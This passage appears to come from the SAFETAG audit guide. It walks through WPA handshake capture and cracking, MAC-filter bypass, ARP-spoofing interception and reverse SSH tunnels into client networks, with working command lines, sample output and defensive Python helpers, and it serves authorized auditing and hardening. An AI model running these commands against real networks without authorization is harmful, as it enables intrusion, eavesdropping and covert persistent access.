 1A:2B:3C:4D:5E:6F  AA:BB:CC:DD:EE:FF  -76    0e- 1      0     1122
 1A:2B:3C:4D:5E:6F  A1:B2:C3:D4:E5:F6  -80    0e- 1      0     4321

wifite is also useful for this step, and claims to automatically de-auth (step 3).

Step 3: Next, the auditor forces a wireless client, possibly chosen at random, to disconnect and reconnect (an operation that is nearly always invisible to the user).

In the example below, AB:CD:EF:AB:CD:EF is the MAC address of a laptop that was briefly disconnected in this way.

$ aireplay-ng -0 1 -a 1A:2B:3C:4D:5E:6F -c AB:CD:EF:AB:CD:EF mon0

 15:54:48  Waiting for beacon frame (BSSID: 1A:2B:3C:4D:5E:6F) on channel -1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AB:CD:EF:AB:CD:EF] [ 5| 3 ACKs]

The goal of this step is to capture the cryptographic handshake that occurs when the targeted client reconnects. Try using different clients if the first one doesn't work, or try (physically) moving around.

This handshake does not contain the WPA key itself, but once the complete handshake has been captured, the auditor (or a potential attacker) can leave the vicinity and run password cracking tools against it to try to discover the password. While a complete password cracking tutorial is out of scope for SAFETAG documentation, below are three strategies:

Step 4: The auditor attempts to discover the WPA password.

A good wordlist with a few tweaks breaks an unfortunate number of passwords. A collection of all English words, all words from the language of the organization being audited, combinations of these, plus relevant keywords, addresses, and years tends to crack most WiFi passwords.

    $ aircrack-ng -w pwdpairs.txt -b 1A:2B:3C:4D:5E:6F sampleorg_airodump*.cap

For WPA captures, John the Ripper can either generate candidates that are piped into an aircrack-ng process or attack the capture directly. For the direct attack you first have to convert the .cap file (from Wireshark, wifite, airodump-ng, etc.) into a format John understands. The Jumbo version we use ships a conversion tool for this:

    $ wpapcap2john wpa.cap > crackme
    $ ./john --wordlist=password.lst --format=wpapsk-cuda crackme
Results

Successful password cracking via piping these into aircrack-ng:

 Opening sampleorg_airodump-01.cap
 Reading packets, please wait...
                                 Aircrack-ng 1.1
                    [00:00:05] 9123 keys tested (1876.54 k/s)
                           KEY FOUND! [ sample2012 ]

      Master Key     : 2A 7C B1 92 C4 61 A9 F6 7F 98 6B C1 AB 53 7A 0F
                       3C AF D7 9A 0C BD F0 4B A2 44 EE 5B 13 94 12 12

      Transient Key  : A9 C8 AD 47 F9 71 2A C6 55 F8 F0 73 FB 9A E6 1D
                       23 D9 31 25 5D B1 CF EA 99 2C B3 D7 E5 7F 91 2D
                       56 25 D5 9A 1F AD C5 02 E3 2C C9 ED 74 55 BA 94
                       D6 F5 0A D1 3B FB 39 40 19 C9 BA 65 2E 49 3D 14

      EAPOL HMAC     : F1 DF 09 C4 5A 96 0B AD 83 DD F9 07 4E FA 19 74 

The line reporting keys tested gives some useful perspective on the effectiveness of a strong WPA key. At roughly 2,000 keys per second, a full brute-force attack on a truly random key of comparable length (say 9 characters drawn from a 70-symbol alphabet, and therefore immune to dictionary attacks) would have to try up to 70^9, about 4 × 10^16, candidates; at this rate that is about 2 × 10^13 seconds, well over 600,000 years. Or, for those who favor length and simplicity over brevity and complexity, a key made of four words chosen from among the 10,000 most common English words (10,000^4 = 10^16 candidates) would still take approximately 150,000 years to exhaust using this method on an average laptop.

It is worth noting that an attacker with the resources and the expertise could increase this rate by a factor of a hundred or more. Using a computer with powerful graphics processing units (GPUs) or a cloud computing service like Amazon’s EC2, it is possible to test 250,000 or more keys per second. A setup like this would still take several lifetimes to guess a strong password, however.

Regardless, the success of this attack against a wireless network would allow an attacker to bypass all perimeter controls, including the network firewall. Without access to the office LAN, a non-ISP, non-government attacker would have to position himself on the same network as an external staff member in order to exploit any flaws in the organization’s email or file-sharing services. With access to the local network, however, that attacker could begin carrying out Local attacks quite quickly, and from a distance.

With regard to the distance from which an attacker could maintain such access, the office WiFi network appears to have a relatively strong signal, which extends to the street out front:

{photograph of location}

Figure 1: WiFi signal strength from a nearby location

{screenshot of WiFi strength}

Material that may be Useful:
Recommendation

WPS PIN Cracking

Summary

WPS was built as an addition to WPA to make adding devices easier without typing a long passphrase, but this ease of use means that a malicious actor can pose as a device and reduce the potentially very strong passphrase WPA allows down to an 8-digit numeric PIN. Worse, the access point confirms the two halves of the PIN separately, so an attacker can guess the first four digits (at most 10,000 attempts) and then the next three (at most 1,000; the eighth digit is a checksum), a total of 11,000 guesses rather than 10^8. This, like WEP, is a "live" attack - you have to stay in range of the network throughout - but also like WEP it is essentially guaranteed: brute forcing the PIN will eventually (typically 2-10 hours) hand you the WPA passphrase and network access. Many newer access points lock WPS after a run of failed attempts, which can slow the attack considerably.
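To make the arithmetic behind that claim concrete, here is an added example (not from the SAFETAG guide) that models the PIN search space: it implements the WPS PIN checksum digit and counts the guesses an online attack needs when the access point rejects a wrong first half after message M4 and a wrong second half after message M6. It sends no packets; the guess rate passed to hours_at is an assumption.

```python
"""Why an 8-digit WPS PIN falls in at most 11,000 guesses.

Added example, not part of the SAFETAG guide. Implements the WPS PIN
checksum (the eighth digit) and shows how confirming the two halves
separately shrinks the search. Nothing here talks to a network.
"""


def wps_checksum(first_seven):
    """Checksum digit for the first seven digits of a WPS PIN.
    Digits are weighted 3,1,3,1,3,1,3 from the left and the checksum makes
    the weighted sum a multiple of 10 (the Wi-Fi Simple Configuration rule)."""
    digits = [int(c) for c in f"{int(first_seven):07d}"]
    accum = sum(d * (3 if i % 2 == 0 else 1) for i, d in enumerate(digits))
    return (10 - accum % 10) % 10


def is_valid_pin(pin):
    """True if an 8-digit PIN carries a correct checksum digit."""
    s = f"{int(pin):08d}"
    return wps_checksum(s[:7]) == int(s[7])


def second_half_candidates(first_half):
    """All 1,000 PINs that share a known first half. Digits 5-7 are free;
    digit 8 is forced by the checksum, so it costs the attacker nothing."""
    for tail in range(1000):
        prefix = first_half * 1000 + tail            # seven digits
        yield f"{prefix * 10 + wps_checksum(prefix):08d}"


def worst_case_guesses():
    """Online guesses when the AP confirms each half separately: it answers
    M4 with a NACK if digits 1-4 are wrong and M6 with a NACK if digits 5-7
    are wrong, so the halves are searched one after the other."""
    return 10**4 + 10**3


def naive_guesses():
    """Valid PINs a blind search would face if the halves could not be
    confirmed separately: 10^8 strings, one in ten with a correct checksum."""
    return 10**7


def hours_at(guesses_per_hour, guesses=None):
    """Worst-case hours at a given online rate (assumption: APs answer a few
    guesses per second, fewer if they rate-limit or lock WPS)."""
    if guesses is None:
        guesses = worst_case_guesses()
    return guesses / guesses_per_hour


if __name__ == "__main__":
    print("12345670 valid:", is_valid_pin("12345670"))
    print(worst_case_guesses(), "guesses worst case vs", naive_guesses(), "valid PINs")
    print(f"at one guess per second: {hours_at(3600):.1f} hours")
```

At one guess per second the worst case is a little over three hours, which is where the "2-10 hours" figure comes from; access points that lock WPS after a few failures push the rate down and the time up, which is worth noting in the report if the router has that feature enabled.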

Walkthrough
Material that may be Useful:
Recommendation
WPS Pin entry should be disabled on the wireless router, or only enabled temporarily to add new devices to the network.

WEP Password Cracking

Summary

WEP provides no effective protection for a WiFi network. Most WiFi routers offer WPA2 (and, on newer hardware, WPA3) as an option, and if this is available it should be enabled immediately. Some older routers (and WiFi devices) do not support WPA2. It is highly recommended to upgrade immediately to hardware that supports it and to eliminate all WEP network access.

Walkthrough

The auditor can be guaranteed to access a WEP network with sufficient time by cracking the WEP key.

Material that may be Useful:

For educational purposes, if no WEP network is available, you can use this pre-built airodump-ng capture file and skip the airodump-ng and aireplay-ng packet injection steps.

Recommendation

Accessing a MAC-filtered Network

Summary

Open and MAC-address-filtered wireless access points are not only open to anyone within range to join and listen in on, but also provide no protection to the devices on the network itself, even if the network does not "broadcast" its name. These may seem like convenient ways to keep unauthorized users off your network without resorting to passwords, but they are trivial to overcome: the MAC address of a client that is already allowed is visible to anyone listening, and a client can change its own MAC address at will.

Overview
Materials Needed
Considerations
Walkthrough

The auditor can easily gain access to an open or MAC address filtered access point.

    # 1. Watch the target AP and note the MAC (STATION) of a client that is already associated
    $ sudo airodump-ng -c 1 --bssid 1A:2B:3C:4D:5E:6F mon0

    # 2. Clone that client's MAC onto the interface you will connect with (not the monitor interface)
    $ sudo ifconfig wlan0 down
    $ sudo macchanger -m [MAC ADDRESS IDENTIFIED] wlan0
    $ sudo ifconfig wlan0 up

    # 3. Connect to the network as usual; the filter sees a whitelisted address
Material that may be Useful:
Recommendation
Transitioning to WPA networks with strong passwords, even for guest networks, is recommended.

Network Mapping

Summary

This component allows the auditor to identify the devices on a host's network, the services that are being used by those devices, and any protections in place.

Purpose

Mapping an organization's network exposes the multitude of devices connected to it -- including mostly forgotten servers -- and provides the baseline for later work on device assessment and vulnerability research.

This process also reveals outside service usage (such as google services, dropbox, or others) which serve -- intentionally or not -- as shadow infrastructure for the organization. In combination with beacon research from the network discovery process, many devices can be associated with users.

The Flow Of Information

Network Mapping Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Network Mapping Methods

Nmap Scanning

Activities

Network Scanning

Summary

Local networks often have a variety of devices connected to them - servers, user devices, staff cellphones, and more. Scanning the connected devices can reveal potential areas for further research (odd ports being open, out of date devices/services, forgotten servers/services...).

Selected scanning of external network devices (websites, webmail, extranet services) may also reveal vulnerabilities or other areas of concern.

Overview
Materials Needed
Considerations
Walkthrough

Using a network scanning tool (nmap/zenmap work well), discover the devices connected to the organization's network, then explore further information such as open services, service banners, and operating systems. More intense scans (full port ranges, version detection, script scans) can be too time-consuming to run across the entire network, so target those at higher value systems. As always, be aware of the scans and additional scripts you choose, and in nmap keep your exploration to scripts categorized as "safe".
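An added example, not from the SAFETAG guide, for turning a scan into a to-do list: it parses the greppable output that nmap -sV -oG scan.gnmap 192.168.1.0/24 writes and flags the services the paragraph above calls out (cleartext logins, file sharing, remote control, anything unidentified, and services on unexpected ports). The scan output embedded below is constructed, and the service categories and "expected" ports are assumptions you would adjust per organization.

```python
"""Triage nmap greppable output (-oG) into follow-up targets.

Added example, not part of the SAFETAG guide. Reads the format that
`nmap -sV -oG scan.gnmap 192.168.1.0/24` writes and flags services that
deserve a closer look. The scan output below is constructed.
"""
from collections import namedtuple

Service = namedtuple("Service", "port proto name version")
Finding = namedtuple("Finding", "host port name reason")

# Constructed sample in the -oG layout: tab-separated "Host:" / "Ports:" /
# "Ignored State:" fields, ports as port/state/proto/owner/service/rpc/version/.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sV -oG scan.gnmap 192.168.1.0/24
Host: 192.168.1.1 ()\tPorts: 23/open/tcp//telnet//Linksys telnetd/, 80/open/tcp//http//Linksys WRT54G http config/\tIgnored State: closed (998)
Host: 192.168.1.10 (fileserver)\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, 139/open/tcp//netbios-ssn//Samba smbd 3.X/, 445/open/tcp//microsoft-ds//Samba smbd 3.X/\tIgnored State: closed (997)
Host: 192.168.1.57 ()\tPorts: 5900/open/tcp//vnc//VNC (protocol 3.8)/, 8443/open/tcp//ssl|https-alt//?/\tIgnored State: closed (998)
# Nmap done at ...
"""

# Assumed categories; tune them to what the organization actually runs.
CLEARTEXT_LOGIN = {"telnet", "ftp", "pop3", "imap", "rlogin", "rsh"}
FILE_SHARING = {"microsoft-ds", "netbios-ssn", "nfs", "afp"}
REMOTE_CONTROL = {"vnc", "ms-wbt-server", "x11"}
EXPECTED_PORTS = {22, 80, 443}


def parse_gnmap(text):
    """Return {host: [Service, ...]} for every host line carrying a Ports: field."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        if "Ports" not in fields:
            continue                                   # e.g. a bare "Status: Up" line
        host = fields["Host"].split(" ", 1)[0]
        services = []
        for entry in fields["Ports"].split(", "):
            port, state, proto, _owner, name, _rpc, version = entry.split("/", 6)
            if state != "open":
                continue
            services.append(Service(int(port), proto, name, version.rstrip("/")))
        hosts[host] = services
    return hosts


def triage(hosts):
    """One Finding per service that merits follow-up, in host order."""
    findings = []
    for host, services in sorted(hosts.items()):
        for svc in services:
            if svc.name in CLEARTEXT_LOGIN:
                reason = "cleartext login, credentials sniffable on the LAN"
            elif svc.name in FILE_SHARING:
                reason = "file sharing, enumerate shares and check access control"
            elif svc.name in REMOTE_CONTROL:
                reason = "remote control service, check authentication and exposure"
            elif svc.version in ("", "?"):
                reason = "unidentified service, investigate manually"
            elif svc.port not in EXPECTED_PORTS:
                reason = "unusual port, confirm it is intentional"
            else:
                continue
            findings.append(Finding(host, svc.port, svc.name, reason))
    return findings


if __name__ == "__main__":
    for f in triage(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{f.host}:{f.port} {f.name}: {f.reason}")
```

The version strings the parser keeps (OpenSSH 5.3, Samba 3.X in the sample) are the input for the vulnerability research step; this script only decides where to look first. Run it against a real file with parse_gnmap(open("scan.gnmap").read()).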

Service research

SMB Network tools

Shared Folders Enumeration

Unsigned SMB sessions (NTLM authentication without SMB signing) are vulnerable to relay (man-in-the-middle) attacks on SMB file servers

Without SMB signing, an attacker on the LAN can relay a workstation's NTLM authentication to a file server and, acting under that user's identity, add, remove or copy files to and from the organization’s file servers (and workstations with file sharing enabled).

Recommendation

While office networks are often treated as "trusted" spaces, measures should be in place to reduce the potential harm of an attacker who gains access. Where SMB file sharing is used, require SMB signing on both servers and clients, which defeats the relay attack above. In addition, devices that "travel" -- such as laptops and mobile phones -- should have adequate security settings (generally, firewalls) to protect them on other networks.

A policy should be in place for connecting personal devices to work networks, as well as work devices to non-work networks.

Network Traffic Analysis

Summary

Any content that is sent out over the network without encryption is easy to intercept; this includes email, web passwords, and chat messages.

This attacker could be someone, such as a patron of the Internet cafe where a staff member is working, who just happens to be using the same local network to connect to the Internet. Or, she could work for an organization with privileged access to the relevant network, such as the Internet Service Provider (ISP) of either the sender or receiver and other network-backbone connections made along the way.

Overview
Materials Needed
Considerations
Walkthrough
Network Traffic Interception

Step 1: The attacker tricks the victim's machine into sending all of its traffic through the attacker's machine. This is done with ARP spoofing: the attacker repeatedly sends forged ARP replies telling the victim that the gateway's IP address (192.168.1.1 below) belongs to the attacker's MAC address, while forwarding the traffic on so that nothing appears broken. Computers accept such replies without verification and are rarely configured to ignore them.

$ sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

$ sudo arpspoof -i wlan0 -t 192.168.1.99 192.168.1.1

Sample Output:

00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
...
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55

In the example above, only a single victim (192.168.1.99) is being targeted, but the attack works fine against multiple victims, or even against the entire network. In other words, the attacker does not need to know which IP address (on the office or Internet cafe LAN, for example) belongs to her target. Furthermore, the victim is extremely unlikely to notice any sign that this phase of the attack is taking place.

EtterCap provides a powerful frontend to managing this process with multiple potential targets. In EtterCap:

Step 2: At this point, if the attacker is looking for unencrypted traffic, all she needs to do is launch a packet-sniffer, such as Wireshark, and scan through the intercepted traffic for specific vulnerable information, such as email or website logins, as well as traffic revealing shadow infrastructure usage, such as Dropbox.
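As the defender's counterpart to the exchange above, here is an added example (not from the SAFETAG guide) that reads ARP replies from a capture and raises an alert when one IP address is claimed by a second MAC, or when a single MAC keeps re-announcing the same mapping the way arpspoof does every couple of seconds. The capture lines are constructed in the layout tcpdump -n -e arp prints; the gateway, victim and attacker MAC addresses are placeholders.

```python
"""Spot ARP spoofing from a capture of ARP replies.

Added example, not part of the SAFETAG guide. Reads ARP replies in the
layout `tcpdump -n -e arp` prints and flags (a) an IP claimed by more than
one MAC and (b) a MAC flooding replies for one IP. Capture lines below are
constructed: the real gateway answers once, then an attacker
(00:11:22:33:44:55) repeatedly claims the gateway's address.
"""
import re
from collections import Counter, defaultdict

SAMPLE_CAPTURE = """\
12:00:01.000000 c0:ff:ee:c0:ff:ee > aa:bb:cc:dd:ee:ff, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at c0:ff:ee:c0:ff:ee, length 28
12:00:03.000000 00:11:22:33:44:55 > aa:bb:cc:dd:ee:ff, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:05.000000 00:11:22:33:44:55 > aa:bb:cc:dd:ee:ff, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:07.000000 00:11:22:33:44:55 > aa:bb:cc:dd:ee:ff, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:09.000000 aa:bb:cc:dd:ee:ff > c0:ff:ee:c0:ff:ee, ethertype ARP (0x0806), length 42: Reply 192.168.1.99 is-at aa:bb:cc:dd:ee:ff, length 28
"""

REPLY_RE = re.compile(r"Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_replies(text):
    """[(ip, mac), ...] in capture order; lines that are not ARP replies are skipped."""
    replies = []
    for line in text.splitlines():
        m = REPLY_RE.search(line)
        if m:
            replies.append((m.group(1), m.group(2).lower()))
    return replies


def detect_spoofing(replies, flood_threshold=3):
    """Return a list of alert strings.

    A second MAC claiming an IP already seen is the signature of poisoning
    (alerted once per new claimant); many replies from one MAC for one IP is
    the periodic re-poisoning arpspoof performs so the victim's cache never
    expires back to the real gateway.
    """
    claimants = defaultdict(list)   # ip -> MACs in order of first appearance
    per_pair = Counter()            # (mac, ip) -> replies seen
    alerts = []
    for ip, mac in replies:
        per_pair[(mac, ip)] += 1
        if mac not in claimants[ip]:
            if claimants[ip]:
                alerts.append(f"conflict: {ip} was {claimants[ip][0]}, now claimed by {mac}")
            claimants[ip].append(mac)
    for (mac, ip), n in per_pair.items():
        if n >= flood_threshold:
            alerts.append(f"flood: {mac} sent {n} replies for {ip}")
    return alerts


if __name__ == "__main__":
    for alert in detect_spoofing(parse_replies(SAMPLE_CAPTURE)):
        print(alert)
```

On a live system you would feed it the output of tcpdump -l -n -e arp. The same two signals are what managed switches' Dynamic ARP Inspection and tools like arpwatch key on; the simplest host-side mitigation for the office gateway is a static ARP entry, which makes the forged replies irrelevant.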

Recommendation

Only use services that encrypt traffic in transit with TLS ("HTTPS"), and turn on the browser's HTTPS-only mode (the HTTPS Everywhere extension that used to provide this has since been retired). This does not itself guarantee protection from all attacks, but it is a good first step in protecting information (such as passwords or email) in transit from your computer to the service provider.

Remote Network and User Device Assessment

Summary

This component allows the auditor to work remotely to identify the devices on a host's network, the services that are being used by those devices, and any protections in place, as well as to assess the security of the individual devices on the network.

Overview

There can be several approaches for this exercise, depending on the scenario.

Scenario 0

The organization has contacted the auditor through an intermediary who is familiar with tech and can follow SAFETAG instructions, or the organization has a tech person among their employees.

This scenario is comparable to a situation where the auditor is on site. In this case, the auditor will instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

The organization has someone among their employees who is ready to follow simple instructions, including opening a terminal and pasting commands we will provide them.

In this scenario, the auditor sends the auditee simple instructions for opening a reverse SSH tunnel to a server the auditor controls, and then assesses the LAN and individual devices through that tunnel. The machine inside the organization's network that establishes the tunnel needs a UNIX-like system with an SSH client: a Linux live distribution or a Mac.

Scenario 2

In this scenario, no one at the organization is ready to apply complex instructions. Instead of relying on an individual, the auditor will rely on tunneling into a device located in the physical space of the auditee. This can be done in two ways:

  1. Remote Desktop or remote VPN into targeted Network. Remote Desktop is tunneling into a targeted machine that lives on the same targeted LAN network where you wish to scan the network and do the device assessment; the auditor controls the machine remotely and uses it as the auditor machine.
  2. VPN to a trusted VPN server. In this case, the auditee will connect one of their machines to a trusted VPN server, and the auditor will connect to the same VPN server, allowing both LANs at the auditee's and auditor's ends to connect.
Materials Needed
Scenario 1
Scenario 2

In the case of remote desktop:

In the case of using an in-the-middle trusted VPN server:

Applications to use: TightVNC, TeamViewer, Windows Remote Desktop

Considerations
Scenario 1
Walkthrough
Scenario 0

Instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

Legend

Instruct the auditee to initiate a connection to the server (S) and set up a reverse ssh server:

Let's assume we have a server named safetag-audit.org (S), and usernames for each auditee called auditee1, auditee2, etc.

Important: make sure that the ports you use don't conflict with ports by other services or auditees, i.e. don't use a port number twice.

Once this session is open, the auditor can access the auditee's machine (C). At this point there are a few powerful options:

example:

to connect to site 0:

    ssh [email protected] -p 2200

with site 1 in the previous example, the port would be 2210 (or whatever the auditee used in her command).

You may also want to make the connection from C to S passwordless and automatic (SSH keys plus a keep-alive wrapper such as autossh do this), so that the tunnel re-establishes itself after a drop without the auditee's help.

WARNING: Make sure to remove/clean any persistent connections once you are done with auditing.

There should be no need for multiple reverse tunnels, as multiple forward tunnels can be set up from S to C if needed (eg. VNC or RDP); this requires multiple forward tunnels from A to S though.

Scenario 2

Legend:

Someone at the auditee's side will prepare machine A in coordination with the auditor, then install TeamViewer.

After that, and using a trusted communication method, TeamViewer ID and passcode will be sent to the Auditor.

The auditor will use the ID and passcode to connect to the machine and start using machine A as the auditing machine.

There are pros and cons for this:

Cons:

  1. Internet speed: You will need a high speed Internet connection to achieve such task, as the remote access will be transferring the desktop of the targeted machine to you in order to do the tasks.
  2. Connection interruption: While you are working remotely, you might face some connection interruptions during your session, and restarting the remote access will be a challenge because in most of the cases you will need someone at the other end to authorize you to tunnel into the machine.
  3. Physical limitations: You are still physically far from the machine, which means you cannot connect a USB drive to boot from it or do any other tasks that require you to be near the device.
  4. Installing Kali Linux might be hard: It might be hard for a non-technical person to prepare a Kali Linux machine

Pros:

  1. Usability: TeamViewer is easy to install and use. Anyone with basic knowledge on how to install software can assist you with preparing the auditing machine.
  2. Network speed: Technically, your auditing machine is the machine you are connected to, which is physically located in the targeted office and connected to the LAN network. This means that you will have full speed running your audit tasks.

Note: Some remote assistant software provides VPN solutions that turn Machine A into a VPN Server and allow Machine B to VPN into it. Tunneling into that VPN server will allow you to connect to the local LAN network, which will allow you to use Machine B to run the audit.

Using an in-the-middle trusted VPN server

Legend:

Auditee's Network --------- (A) ---------- C ---------- (B) ---------- Auditor's Network

The auditor will put efforts preparing an OpenVPN server (C) and create 2 profiles (Keys and configurations) to allow machines A and B to connect to C.

Get a VPS from your favorite and trusted VPS provider and keep in mind the physical location of the server, then install OpenVPN Server by following the instructions contained in this guide on Ubuntu Server.

The default configuration of OpenVPN will not allow the clients (A and B) to see each other on the network. To allow that, you have to enable the client-to-client directive and tell the server which client sits in front of which LAN, so that both subnets (the auditee's and the auditor's) can reach each other. To do so, follow these instructions.
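As an added example, not from the SAFETAG guide, the relevant part of the OpenVPN server configuration on C looks like this. The addressing is assumed: VPN pool 10.8.0.0/24, the auditee's LAN 192.168.1.0/24 behind the client whose certificate name is "auditee-a", and the auditor's LAN 192.168.2.0/24 behind "auditor-b". Certificate, key and cipher settings from the base install are omitted:

```conf
# /etc/openvpn/server.conf (excerpt)
port 1194
proto udp
dev tun
server 10.8.0.0 255.255.255.0

# Let VPN clients talk to each other instead of only to the server.
client-to-client

# Per-client files live here; the file name is the client's certificate CN.
client-config-dir ccd

# Tell the server's kernel that these LANs are reachable through the tunnel.
route 192.168.1.0 255.255.255.0
route 192.168.2.0 255.255.255.0

# /etc/openvpn/ccd/auditee-a
#   iroute   binds the auditee's LAN to this client inside OpenVPN
#   push     gives this client a route to the auditor's LAN only
iroute 192.168.1.0 255.255.255.0
push "route 192.168.2.0 255.255.255.0"

# /etc/openvpn/ccd/auditor-b
iroute 192.168.2.0 255.255.255.0
push "route 192.168.1.0 255.255.255.0"
```

Two things make or break this in practice. Machine A must have IP forwarding enabled, and the other hosts on the auditee's LAN need a route back to 10.8.0.0/24 and 192.168.2.0/24 via A (or A must NAT the tunnel traffic), otherwise the auditor's scans reach A but their replies never come back. Pushing each LAN route only to the client on the other side, as the ccd files above do, avoids giving a client a route to its own subnet through the tunnel.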

After finishing the installation and testing it, the auditor will pass the .ovpn file to the person at the auditee's site through a trusted way, and provide instructions on how to install and connect to the server. After connecting A and B to C, the auditor will be able to start the network and device assessment at the other end.

Note: In case the VPN is censored in A or B's countries, or in both, you can follow these instructions on how to bypass the censorship by using pluggable transports.

Recommendation

Router Attacks

Covered in full in Vulnerability Scanning and Analysis

Wireless Range Mapping

Covered in full in Network Discovery

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjunction with the Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

Monitor Open Wireless Traffic

Covered in full in Network Discovery

Each wireless device maintains a "memory" of the networks it has successfully connected to. When it is looking for a network, it sends out "probes" for the networks in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device. (Newer phones and laptops randomize their MAC address while scanning and send directed probes mainly for hidden networks, so this yields less than it once did; it still works well on older devices and for hidden-network probes.)

These network probes often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of its wireless network to be associated with the organization, but the association may be revealed by this additional metadata.

These probes (what SAFETAG elsewhere calls "beacon research") can "de-anonymize" an obfuscated network name as well as provide rich material for social engineering attacks. This provides an only-lightly-invasive introduction to a discussion of the trackability of devices, particularly mobiles and laptops.
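An added example, not part of the SAFETAG guide, of how to turn a probe capture into that discussion: it reads the station section of the CSV that airodump-ng -w <prefix> writes (<prefix>-01.csv), groups probed network names per device, and tags the names that give something away. The CSV rows, the keyword lists and the one-entry OUI table are constructed placeholders; a real run would use an actual OUI database for the vendor lookup and the organization's own names from the Preparation research.

```python
"""Group probe requests by station and pick out the telling SSIDs.

Added example, not part of the SAFETAG guide. Parses the station section of
airodump-ng's CSV output and tags probed network names that look like a
person, a travel location or the organization itself. All data below is
constructed; the OUI table stands in for a real vendor database.
"""
import re

MAC_RE = re.compile(r"[0-9A-Fa-f:]{17}")

# Constructed station rows in airodump-ng's CSV layout:
# Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
SAMPLE_STATIONS_CSV = """\
Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AB:CD:EF:12:34:56, 2012-01-23 12:30:01, 2012-01-23 12:45:10, -60, 42, (not associated), Maria's iPhone,SampleOrg-Guest,JFK Free WiFi
AB:CD:EF:65:43:21, 2012-01-23 12:31:07, 2012-01-23 12:44:59, -71, 17, 1A:2B:3C:4D:5E:6F, sampleorg
01:23:45:67:89:01, 2012-01-23 12:33:20, 2012-01-23 12:45:02, -55, 9, (not associated), Hotel Lobby,Cafe Central
"""

ORG_KEYWORDS = ["sampleorg", "sample"]                               # from the audit's OSINT
TRAVEL_KEYWORDS = ["airport", "hotel", "cafe", "café", "free wifi", "jfk", "conference"]
DEVICE_KEYWORDS = ["iphone", "android", "galaxy", "pixel"]
OUI_TABLE = {"AB:CD:EF": "ExampleVendor"}                            # placeholder


def parse_stations(csv_text):
    """{station_mac: {"bssid": ..., "probes": [...]}} from station rows only.
    AP rows (which also start with a MAC) are rejected because their sixth
    field is an encryption type, not a BSSID or "(not associated)"."""
    stations = {}
    for line in csv_text.splitlines():
        parts = line.split(", ", 6)
        if len(parts) < 6 or not MAC_RE.fullmatch(parts[0]):
            continue
        bssid = parts[5].strip()
        if bssid != "(not associated)" and not MAC_RE.fullmatch(bssid):
            continue
        probes = [p.strip() for p in parts[6].split(",") if p.strip()] if len(parts) == 7 else []
        stations[parts[0].upper()] = {"bssid": bssid, "probes": probes}
    return stations


def classify(ssid):
    """Heuristic tags saying why a probed name matters to the report."""
    low = ssid.lower()
    tags = []
    if any(k in low for k in ORG_KEYWORDS):
        tags.append("organization")
    if any(k in low for k in TRAVEL_KEYWORDS):
        tags.append("travel")
    if "'s " in low or "\u2019s " in low:
        tags.append("personal-name")
    if any(k in low for k in DEVICE_KEYWORDS):
        tags.append("personal-device")
    return tags


def vendor(mac):
    """Manufacturer from the first three octets (needs a real OUI database)."""
    return OUI_TABLE.get(mac[:8].upper(), "unknown")


def report(csv_text):
    """Per station: vendor, what it is associated to (if anything), tagged probes."""
    out = {}
    for mac, info in parse_stations(csv_text).items():
        out[mac] = {
            "vendor": vendor(mac),
            "associated_to": None if info["bssid"] == "(not associated)" else info["bssid"],
            "probes": {ssid: classify(ssid) for ssid in info["probes"]},
        }
    return out


if __name__ == "__main__":
    for mac, info in report(SAMPLE_STATIONS_CSV).items():
        print(mac, info["vendor"], info["associated_to"] or "(not associated)")
        for ssid, tags in info["probes"].items():
            print("   ", ssid, tags or "")
```

In the constructed sample one unassociated device both names its owner and probes for a SampleOrg network, which is exactly the kind of link between a person, an organization and a device that the text above describes; devices that are associated with the office BSSID confirm which network is the organization's when several are in range.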

User Device Assessment

Summary

This component allows the auditor to assess the security of the individual devices on the network. This component consists of interviews, surveys, and inspection of devices.

Purpose

Compromised devices have the ability to undermine nearly any other organizational attempt at securing information. Knowing if devices receive basic software and security upgrades and what core protections against unauthorized access exist is vital to designing a strategy to make the host more secure.

The Flow Of Information

User Device Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Password Security

Privilege Separation Across OS

Examining Firewalls Across OS

Identifying Software Versions

Device Encryption By OS

